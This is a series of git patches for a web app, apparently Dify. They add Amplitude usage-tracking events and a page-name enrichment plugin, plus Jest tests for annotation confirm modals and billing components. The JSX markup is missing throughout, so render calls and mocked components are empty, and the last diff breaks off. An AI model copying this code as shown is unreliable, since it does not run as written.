&shared-api-worker-env WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE: ${WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE:-100} WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK: ${WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK:-0} TENANT_ISOLATED_TASK_CONCURRENCY: ${TENANT_ISOLATED_TASK_CONCURRENCY:-1} + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: ${ANNOTATION_IMPORT_FILE_SIZE_LIMIT:-2} + ANNOTATION_IMPORT_MAX_RECORDS: ${ANNOTATION_IMPORT_MAX_RECORDS:-10000} + ANNOTATION_IMPORT_MIN_RECORDS: ${ANNOTATION_IMPORT_MIN_RECORDS:-1} + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:-5} + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:-20} + ANNOTATION_IMPORT_MAX_CONCURRENT: ${ANNOTATION_IMPORT_MAX_CONCURRENT:-5} AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} services: From d942adf3b2d701b6458965c070cb4f65042e7ca0 Mon Sep 17 00:00:00 2001 From: Coding On Star <447357187@qq.com> Date: Mon, 15 Dec 2025 15:25:10 +0800 Subject: [PATCH 03/16] feat: Enhance Amplitude tracking across various components (#29662) Co-authored-by: CodingOnStar --- .../components/app/app-publisher/index.tsx | 4 +- .../base/amplitude/AmplitudeProvider.tsx | 42 ++++++++++++++++++- .../create-from-pipeline/list/create-card.tsx | 4 ++ .../list/template-card/index.tsx | 8 +++- .../empty-dataset-creation-modal/index.tsx | 5 +++ .../datasets/create/step-two/index.tsx | 5 +++ .../documents/create-from-pipeline/index.tsx | 5 +++ .../connector/index.tsx | 5 +++ .../plugin-detail-panel/detail-header.tsx | 4 +- .../panel/test-run/preparation/index.tsx | 2 + .../rag-pipeline-header/publisher/popup.tsx | 2 + .../workflow-app/hooks/use-workflow-run.ts | 2 + .../block-selector/tool/action-item.tsx | 5 +++ .../components/workflow/header/run-mode.tsx | 6 +++ .../nodes/_base/hooks/use-one-step-run.ts | 2 + 15 files changed, 96 insertions(+), 5 deletions(-) diff --git a/web/app/components/app/app-publisher/index.tsx b/web/app/components/app/app-publisher/index.tsx index 2dc45e1337..5aea337f85 100644 --- a/web/app/components/app/app-publisher/index.tsx +++ b/web/app/components/app/app-publisher/index.tsx @@ -51,6 +51,7 @@ import { AppModeEnum } from '@/types/app' import type { PublishWorkflowParams } from '@/types/workflow' import { basePath } from '@/utils/var' import UpgradeBtn from '@/app/components/billing/upgrade-btn' +import { trackEvent } from '@/app/components/base/amplitude' const ACCESS_MODE_MAP: Record = { [AccessMode.ORGANIZATION]: { @@ -189,11 +190,12 @@ const AppPublisher = ({ try { await onPublish?.(params) setPublished(true) + trackEvent('app_published_time', { action_mode: 'app', app_id: appDetail?.id, app_name: appDetail?.name }) } catch { setPublished(false) } - }, [onPublish]) + }, [appDetail, onPublish]) const handleRestore = useCallback(async () => { try { diff --git a/web/app/components/base/amplitude/AmplitudeProvider.tsx b/web/app/components/base/amplitude/AmplitudeProvider.tsx index 424475aba7..6c378ab64f 100644 --- a/web/app/components/base/amplitude/AmplitudeProvider.tsx +++ b/web/app/components/base/amplitude/AmplitudeProvider.tsx @@ -15,6 +15,43 @@ export const isAmplitudeEnabled = () => { return IS_CLOUD_EDITION && !!AMPLITUDE_API_KEY } +// Map URL pathname to English page name for consistent Amplitude tracking +const getEnglishPageName = (pathname: string): string => { + // Remove leading slash and get the first segment + const segments = pathname.replace(/^\//, '').split('/') + const firstSegment = segments[0] || 'home' + + const pageNameMap: Record = { + '': 'Home', + 'apps': 'Studio', + 'datasets': 'Knowledge', + 'explore': 'Explore', + 'tools': 'Tools', + 'account': 'Account', + 'signin': 'Sign In', + 'signup': 'Sign Up', + } + + return pageNameMap[firstSegment] || firstSegment.charAt(0).toUpperCase() + firstSegment.slice(1) +} + +// Enrichment plugin to override page title with English name for page view events +const pageNameEnrichmentPlugin = (): amplitude.Types.EnrichmentPlugin => { + return { + name: 'page-name-enrichment', + type: 'enrichment', + setup: async () => undefined, + execute: async (event: amplitude.Types.Event) => { + // Only modify page view events + if (event.event_type === '[Amplitude] Page Viewed' && event.event_properties) { + const pathname = typeof window !== 'undefined' ? window.location.pathname : '' + event.event_properties['[Amplitude] Page Title'] = getEnglishPageName(pathname) + } + return event + }, + } +} + const AmplitudeProvider: FC = ({ sessionReplaySampleRate = 1, }) => { @@ -31,10 +68,11 @@ const AmplitudeProvider: FC = ({ formInteractions: true, fileDownloads: true, }, - // Enable debug logs in development environment - logLevel: amplitude.Types.LogLevel.Warn, }) + // Add page name enrichment plugin to override page title with English name + amplitude.add(pageNameEnrichmentPlugin()) + // Add Session Replay plugin const sessionReplay = sessionReplayPlugin({ sampleRate: sessionReplaySampleRate, diff --git a/web/app/components/datasets/create-from-pipeline/list/create-card.tsx b/web/app/components/datasets/create-from-pipeline/list/create-card.tsx index 43c6da0dfc..12008b2d4d 100644 --- a/web/app/components/datasets/create-from-pipeline/list/create-card.tsx +++ b/web/app/components/datasets/create-from-pipeline/list/create-card.tsx @@ -5,6 +5,7 @@ import { useCreatePipelineDataset } from '@/service/knowledge/use-create-dataset import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' import Toast from '@/app/components/base/toast' import { useRouter } from 'next/navigation' +import { trackEvent } from '@/app/components/base/amplitude' const CreateCard = () => { const { t } = useTranslation() @@ -23,6 +24,9 @@ const CreateCard = () => { message: t('datasetPipeline.creation.successTip'), }) invalidDatasetList() + trackEvent('create_datasets_from_scratch', { + dataset_id: id, + }) push(`/datasets/${id}/pipeline`) } }, diff --git a/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx b/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx index cde3bc0e00..a2fe3d164b 100644 --- a/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx +++ b/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx @@ -19,6 +19,7 @@ import Content from './content' import Actions from './actions' import { useCreatePipelineDatasetFromCustomized } from '@/service/knowledge/use-create-dataset' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' +import { trackEvent } from '@/app/components/base/amplitude' type TemplateCardProps = { pipeline: PipelineTemplate @@ -66,6 +67,11 @@ const TemplateCard = ({ invalidDatasetList() if (newDataset.pipeline_id) await handleCheckPluginDependencies(newDataset.pipeline_id, true) + trackEvent('create_datasets_with_pipeline', { + template_name: pipeline.name, + template_id: pipeline.id, + template_type: type, + }) push(`/datasets/${newDataset.dataset_id}/pipeline`) }, onError: () => { @@ -75,7 +81,7 @@ const TemplateCard = ({ }) }, }) - }, [getPipelineTemplateInfo, createDataset, t, handleCheckPluginDependencies, push, invalidDatasetList]) + }, [getPipelineTemplateInfo, createDataset, t, handleCheckPluginDependencies, push, invalidDatasetList, pipeline.name, pipeline.id, type]) const handleShowTemplateDetails = useCallback(() => { setShowDetailModal(true) diff --git a/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx b/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx index 12b9366744..29986e4fca 100644 --- a/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx +++ b/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx @@ -12,6 +12,7 @@ import Button from '@/app/components/base/button' import { ToastContext } from '@/app/components/base/toast' import { createEmptyDataset } from '@/service/datasets' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' +import { trackEvent } from '@/app/components/base/amplitude' type IProps = { show: boolean @@ -40,6 +41,10 @@ const EmptyDatasetCreationModal = ({ try { const dataset = await createEmptyDataset({ name: inputValue }) invalidDatasetList() + trackEvent('create_empty_datasets', { + name: inputValue, + dataset_id: dataset.id, + }) onHide() router.push(`/datasets/${dataset.id}/documents`) } diff --git a/web/app/components/datasets/create/step-two/index.tsx b/web/app/components/datasets/create/step-two/index.tsx index 43be89c326..4d568e9a6c 100644 --- a/web/app/components/datasets/create/step-two/index.tsx +++ b/web/app/components/datasets/create/step-two/index.tsx @@ -64,6 +64,7 @@ import { noop } from 'lodash-es' import { useDocLink } from '@/context/i18n' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' import { checkShowMultiModalTip } from '../../settings/utils' +import { trackEvent } from '@/app/components/base/amplitude' const TextLabel: FC = (props) => { return @@ -568,6 +569,10 @@ const StepTwo = ({ if (mutateDatasetRes) mutateDatasetRes() invalidDatasetList() + trackEvent('create_datasets', { + data_source_type: dataSourceType, + indexing_technique: getIndexing_technique(), + }) onStepChange?.(+1) if (isSetting) onSave?.() diff --git a/web/app/components/datasets/documents/create-from-pipeline/index.tsx b/web/app/components/datasets/documents/create-from-pipeline/index.tsx index 79e3694da8..eb87c83489 100644 --- a/web/app/components/datasets/documents/create-from-pipeline/index.tsx +++ b/web/app/components/datasets/documents/create-from-pipeline/index.tsx @@ -40,6 +40,7 @@ import UpgradeCard from '../../create/step-one/upgrade-card' import Divider from '@/app/components/base/divider' import { useBoolean } from 'ahooks' import PlanUpgradeModal from '@/app/components/billing/plan-upgrade-modal' +import { trackEvent } from '@/app/components/base/amplitude' const CreateFormPipeline = () => { const { t } = useTranslation() @@ -343,6 +344,10 @@ const CreateFormPipeline = () => { setBatchId((res as PublishedPipelineRunResponse).batch || '') setDocuments((res as PublishedPipelineRunResponse).documents || []) handleNextStep() + trackEvent('dataset_document_added', { + data_source_type: datasourceType, + indexing_technique: 'pipeline', + }) }, }) }, [dataSourceStore, datasource, datasourceType, handleNextStep, pipelineId, runPublishedPipeline]) diff --git a/web/app/components/datasets/external-knowledge-base/connector/index.tsx b/web/app/components/datasets/external-knowledge-base/connector/index.tsx index 33f57d0b47..ec055a049f 100644 --- a/web/app/components/datasets/external-knowledge-base/connector/index.tsx +++ b/web/app/components/datasets/external-knowledge-base/connector/index.tsx @@ -6,6 +6,7 @@ import { useToastContext } from '@/app/components/base/toast' import ExternalKnowledgeBaseCreate from '@/app/components/datasets/external-knowledge-base/create' import type { CreateKnowledgeBaseReq } from '@/app/components/datasets/external-knowledge-base/create/declarations' import { createExternalKnowledgeBase } from '@/service/datasets' +import { trackEvent } from '@/app/components/base/amplitude' const ExternalKnowledgeBaseConnector = () => { const { notify } = useToastContext() @@ -18,6 +19,10 @@ const ExternalKnowledgeBaseConnector = () => { const result = await createExternalKnowledgeBase({ body: formValue }) if (result && result.id) { notify({ type: 'success', message: 'External Knowledge Base Connected Successfully' }) + trackEvent('create_external_knowledge_base', { + provider: formValue.provider, + name: formValue.name, + }) router.back() } else { throw new Error('Failed to create external knowledge base') } diff --git a/web/app/components/plugins/plugin-detail-panel/detail-header.tsx b/web/app/components/plugins/plugin-detail-panel/detail-header.tsx index 197f2e2a92..e1cd1bbcd4 100644 --- a/web/app/components/plugins/plugin-detail-panel/detail-header.tsx +++ b/web/app/components/plugins/plugin-detail-panel/detail-header.tsx @@ -44,6 +44,7 @@ import { AUTO_UPDATE_MODE } from '../reference-setting-modal/auto-update-setting import { convertUTCDaySecondsToLocalSeconds, timeOfDayToDayjs } from '../reference-setting-modal/auto-update-setting/utils' import type { PluginDetail } from '../types' import { PluginCategoryEnum, PluginSource } from '../types' +import { trackEvent } from '@/app/components/base/amplitude' const i18nPrefix = 'plugin.action' @@ -212,8 +213,9 @@ const DetailHeader = ({ refreshModelProviders() if (PluginCategoryEnum.tool.includes(category)) invalidateAllToolProviders() + trackEvent('plugin_uninstalled', { plugin_id, plugin_name: name }) } - }, [showDeleting, id, hideDeleting, hideDeleteConfirm, onUpdate, category, refreshModelProviders, invalidateAllToolProviders]) + }, [showDeleting, id, hideDeleting, hideDeleteConfirm, onUpdate, category, refreshModelProviders, invalidateAllToolProviders, plugin_id, name]) return (
diff --git a/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx b/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx index c659d8669a..8a1d33b202 100644 --- a/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx +++ b/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx @@ -21,6 +21,7 @@ import { useDataSourceStore, useDataSourceStoreWithSelector } from '@/app/compon import { useShallow } from 'zustand/react/shallow' import { useWorkflowStore } from '@/app/components/workflow/store' import StepIndicator from './step-indicator' +import { trackEvent } from '@/app/components/base/amplitude' const Preparation = () => { const { @@ -121,6 +122,7 @@ const Preparation = () => { datasource_type: datasourceType, datasource_info_list: datasourceInfoList, }) + trackEvent('pipeline_start_action_time', { action_type: 'document_processing' }) setIsPreparingDataSource?.(false) }, [dataSourceStore, datasource, datasourceType, handleRun, workflowStore]) diff --git a/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx b/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx index 42ca643cb0..52344f6278 100644 --- a/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx +++ b/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx @@ -47,6 +47,7 @@ import { useModalContextSelector } from '@/context/modal-context' import Link from 'next/link' import { useDatasetApiAccessUrl } from '@/hooks/use-api-access-url' import { useFormatTimeFromNow } from '@/hooks/use-format-time-from-now' +import { trackEvent } from '@/app/components/base/amplitude' const PUBLISH_SHORTCUT = ['ctrl', '⇧', 'P'] @@ -109,6 +110,7 @@ const Popup = () => { releaseNotes: params?.releaseNotes || '', }) setPublished(true) + trackEvent('app_published_time', { action_mode: 'pipeline', app_id: datasetId, app_name: params?.title || '' }) if (res) { notify({ type: 'success', diff --git a/web/app/components/workflow-app/hooks/use-workflow-run.ts b/web/app/components/workflow-app/hooks/use-workflow-run.ts index 6164969b3d..f051f73489 100644 --- a/web/app/components/workflow-app/hooks/use-workflow-run.ts +++ b/web/app/components/workflow-app/hooks/use-workflow-run.ts @@ -29,6 +29,7 @@ import { post } from '@/service/base' import { ContentType } from '@/service/fetch' import { TriggerType } from '@/app/components/workflow/header/test-run-menu' import { AppModeEnum } from '@/types/app' +import { trackEvent } from '@/app/components/base/amplitude' type HandleRunMode = TriggerType type HandleRunOptions = { @@ -359,6 +360,7 @@ export const useWorkflowRun = () => { if (onError) onError(params) + trackEvent('workflow_run_failed', { workflow_id: flowId, reason: params.error, node_type: params.node_type }) } const wrappedOnCompleted: IOtherOptions['onCompleted'] = async (hasError?: boolean, errorMessage?: string) => { diff --git a/web/app/components/workflow/block-selector/tool/action-item.tsx b/web/app/components/workflow/block-selector/tool/action-item.tsx index 1ca61b3039..2151beefab 100644 --- a/web/app/components/workflow/block-selector/tool/action-item.tsx +++ b/web/app/components/workflow/block-selector/tool/action-item.tsx @@ -13,6 +13,7 @@ import { useTranslation } from 'react-i18next' import useTheme from '@/hooks/use-theme' import { Theme } from '@/types/app' import { basePath } from '@/utils/var' +import { trackEvent } from '@/app/components/base/amplitude' const normalizeProviderIcon = (icon?: ToolWithProvider['icon']) => { if (!icon) @@ -102,6 +103,10 @@ const ToolItem: FC = ({ params, meta: provider.meta, }) + trackEvent('tool_selected', { + tool_name: payload.name, + plugin_id: provider.plugin_id, + }) }} >
diff --git a/web/app/components/workflow/header/run-mode.tsx b/web/app/components/workflow/header/run-mode.tsx index 7a1d444d30..bd34cf6879 100644 --- a/web/app/components/workflow/header/run-mode.tsx +++ b/web/app/components/workflow/header/run-mode.tsx @@ -12,6 +12,7 @@ import { StopCircle } from '@/app/components/base/icons/src/vender/line/mediaAnd import { useDynamicTestRunOptions } from '../hooks/use-dynamic-test-run-options' import TestRunMenu, { type TestRunMenuRef, type TriggerOption, TriggerType } from './test-run-menu' import { useToastContext } from '@/app/components/base/toast' +import { trackEvent } from '@/app/components/base/amplitude' type RunModeProps = { text?: string @@ -69,22 +70,27 @@ const RunMode = ({ if (option.type === TriggerType.UserInput) { handleWorkflowStartRunInWorkflow() + trackEvent('app_start_action_time', { action_type: 'user_input' }) } else if (option.type === TriggerType.Schedule) { handleWorkflowTriggerScheduleRunInWorkflow(option.nodeId) + trackEvent('app_start_action_time', { action_type: 'schedule' }) } else if (option.type === TriggerType.Webhook) { if (option.nodeId) handleWorkflowTriggerWebhookRunInWorkflow({ nodeId: option.nodeId }) + trackEvent('app_start_action_time', { action_type: 'webhook' }) } else if (option.type === TriggerType.Plugin) { if (option.nodeId) handleWorkflowTriggerPluginRunInWorkflow(option.nodeId) + trackEvent('app_start_action_time', { action_type: 'plugin' }) } else if (option.type === TriggerType.All) { const targetNodeIds = option.relatedNodeIds?.filter(Boolean) if (targetNodeIds && targetNodeIds.length > 0) handleWorkflowRunAllTriggersInWorkflow(targetNodeIds) + trackEvent('app_start_action_time', { action_type: 'all' }) } else { // Placeholder for trigger-specific execution logic for schedule, webhook, plugin types diff --git a/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts b/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts index 77d75ccc4f..dad62ae2a4 100644 --- a/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts +++ b/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts @@ -68,6 +68,7 @@ import { useAllMCPTools, useAllWorkflowTools, } from '@/service/use-tools' +import { trackEvent } from '@/app/components/base/amplitude' // eslint-disable-next-line ts/no-unsafe-function-type const checkValidFns: Partial> = { @@ -973,6 +974,7 @@ const useOneStepRun = ({ _singleRunningStatus: NodeRunningStatus.Failed, }, }) + trackEvent('workflow_run_failed', { workflow_id: flowId, node_id: id, reason: res.error, node_type: data?.type }) }, }, ) From a951f46a093160380aace0f7cc50497913d890db Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 15:38:04 +0800 Subject: [PATCH 04/16] chore: tests for annotation (#29664) --- .../index.spec.tsx | 98 +++++++++++++++++++ .../index.spec.tsx | 98 +++++++++++++++++++ 2 files changed, 196 insertions(+) create mode 100644 web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx create mode 100644 web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('RemoveAnnotationConfirmModal', () => { + // Rendering behavior driven by isShow and translations + describe('Rendering', () => { + test('should display the confirm modal when visible', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Remove annotation?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render modal content when hidden', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Remove annotation?')).not.toBeInTheDocument() + }) + }) + + // User interactions with confirm and cancel buttons + describe('Interactions', () => { + test('should call onHide when cancel button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onRemove).not.toHaveBeenCalled() + }) + + test('should call onRemove when confirm button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onRemove).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) From 2b3c55d95a9c4ee562b86b6275d433988ce2abc6 Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 16:13:14 +0800 Subject: [PATCH 05/16] chore: some billing test (#29648) Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: Coding On Star <447357187@qq.com> --- .../billing/annotation-full/index.spec.tsx | 71 +++++++++++ .../billing/annotation-full/modal.spec.tsx | 119 ++++++++++++++++++ .../cloud-plan-item/list/item/index.spec.tsx | 52 ++++++++ .../list/item/tooltip.spec.tsx | 46 +++++++ .../cloud-plan-item/list/item/tooltip.tsx | 4 +- 5 files changed, 291 insertions(+), 1 deletion(-) create mode 100644 web/app/components/billing/annotation-full/index.spec.tsx create mode 100644 web/app/components/billing/annotation-full/modal.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx diff --git a/web/app/components/billing/annotation-full/index.spec.tsx b/web/app/components/billing/annotation-full/index.spec.tsx new file mode 100644 index 0000000000..77a0940f12 --- /dev/null +++ b/web/app/components/billing/annotation-full/index.spec.tsx @@ -0,0 +1,71 @@ +import { render, screen } from '@testing-library/react' +import AnnotationFull from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +let mockUsageProps: { className?: string } | null = null +jest.mock('./usage', () => ({ + __esModule: true, + default: (props: { className?: string }) => { + mockUsageProps = props + return ( +
+ usage +
+ ) + }, +})) + +let mockUpgradeBtnProps: { loc?: string } | null = null +jest.mock('../upgrade-btn', () => ({ + __esModule: true, + default: (props: { loc?: string }) => { + mockUpgradeBtnProps = props + return ( + + ) + }, +})) + +describe('AnnotationFull', () => { + beforeEach(() => { + jest.clearAllMocks() + mockUsageProps = null + mockUpgradeBtnProps = null + }) + + // Rendering marketing copy with action button + describe('Rendering', () => { + it('should render tips when rendered', () => { + // Act + render() + + // Assert + expect(screen.getByText('billing.annotatedResponse.fullTipLine1')).toBeInTheDocument() + expect(screen.getByText('billing.annotatedResponse.fullTipLine2')).toBeInTheDocument() + }) + + it('should render upgrade button when rendered', () => { + // Act + render() + + // Assert + expect(screen.getByTestId('upgrade-btn')).toBeInTheDocument() + }) + + it('should render Usage component when rendered', () => { + // Act + render() + + // Assert + const usageComponent = screen.getByTestId('usage-component') + expect(usageComponent).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/billing/annotation-full/modal.spec.tsx b/web/app/components/billing/annotation-full/modal.spec.tsx new file mode 100644 index 0000000000..da2b2041b0 --- /dev/null +++ b/web/app/components/billing/annotation-full/modal.spec.tsx @@ -0,0 +1,119 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import AnnotationFullModal from './modal' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +let mockUsageProps: { className?: string } | null = null +jest.mock('./usage', () => ({ + __esModule: true, + default: (props: { className?: string }) => { + mockUsageProps = props + return ( +
+ usage +
+ ) + }, +})) + +let mockUpgradeBtnProps: { loc?: string } | null = null +jest.mock('../upgrade-btn', () => ({ + __esModule: true, + default: (props: { loc?: string }) => { + mockUpgradeBtnProps = props + return ( + + ) + }, +})) + +type ModalSnapshot = { + isShow: boolean + closable?: boolean + className?: string +} +let mockModalProps: ModalSnapshot | null = null +jest.mock('../../base/modal', () => ({ + __esModule: true, + default: ({ isShow, children, onClose, closable, className }: { isShow: boolean; children: React.ReactNode; onClose: () => void; closable?: boolean; className?: string }) => { + mockModalProps = { + isShow, + closable, + className, + } + if (!isShow) + return null + return ( +
+ {closable && ( + + )} + {children} +
+ ) + }, +})) + +describe('AnnotationFullModal', () => { + beforeEach(() => { + jest.clearAllMocks() + mockUsageProps = null + mockUpgradeBtnProps = null + mockModalProps = null + }) + + // Rendering marketing copy inside modal + describe('Rendering', () => { + it('should display main info when visible', () => { + // Act + render() + + // Assert + expect(screen.getByText('billing.annotatedResponse.fullTipLine1')).toBeInTheDocument() + expect(screen.getByText('billing.annotatedResponse.fullTipLine2')).toBeInTheDocument() + expect(screen.getByTestId('usage-component')).toHaveAttribute('data-classname', 'mt-4') + expect(screen.getByTestId('upgrade-btn')).toHaveTextContent('annotation-create') + expect(mockUpgradeBtnProps?.loc).toBe('annotation-create') + expect(mockModalProps).toEqual(expect.objectContaining({ + isShow: true, + closable: true, + className: '!p-0', + })) + }) + }) + + // Controlling modal visibility + describe('Visibility', () => { + it('should not render content when hidden', () => { + // Act + const { container } = render() + + // Assert + expect(container).toBeEmptyDOMElement() + expect(mockModalProps).toEqual(expect.objectContaining({ isShow: false })) + }) + }) + + // Handling close interactions + describe('Close handling', () => { + it('should trigger onHide when close control is clicked', () => { + // Arrange + const onHide = jest.fn() + + // Act + render() + fireEvent.click(screen.getByTestId('mock-modal-close')) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx new file mode 100644 index 0000000000..25ee1fb8c8 --- /dev/null +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx @@ -0,0 +1,52 @@ +import { render, screen } from '@testing-library/react' +import Item from './index' + +describe('Item', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering the plan item row + describe('Rendering', () => { + it('should render the provided label when tooltip is absent', () => { + // Arrange + const label = 'Monthly credits' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(container.querySelector('.group')).toBeNull() + }) + }) + + // Toggling the optional tooltip indicator + describe('Tooltip behavior', () => { + it('should render tooltip content when tooltip text is provided', () => { + // Arrange + const label = 'Workspace seats' + const tooltip = 'Seats define how many teammates can join the workspace.' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(screen.getByText(tooltip)).toBeInTheDocument() + expect(container.querySelector('.group')).not.toBeNull() + }) + + it('should treat an empty tooltip string as absent', () => { + // Arrange + const label = 'Vector storage' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(container.querySelector('.group')).toBeNull() + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx new file mode 100644 index 0000000000..b1a6750fd7 --- /dev/null +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx @@ -0,0 +1,46 @@ +import { render, screen } from '@testing-library/react' +import Tooltip from './tooltip' + +describe('Tooltip', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering the info tooltip container + describe('Rendering', () => { + it('should render the content panel when provide with text', () => { + // Arrange + const content = 'Usage resets on the first day of every month.' + + // Act + render() + + // Assert + expect(() => screen.getByText(content)).not.toThrow() + }) + }) + + describe('Icon rendering', () => { + it('should render the icon when provided with content', () => { + // Arrange + const content = 'Tooltips explain each plan detail.' + + // Act + render() + + // Assert + expect(screen.getByTestId('tooltip-icon')).toBeInTheDocument() + }) + }) + + // Handling empty strings while keeping structure consistent + describe('Edge cases', () => { + it('should render without crashing when passed empty content', () => { + // Arrange + const content = '' + + // Act and Assert + expect(() => render()).not.toThrow() + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx 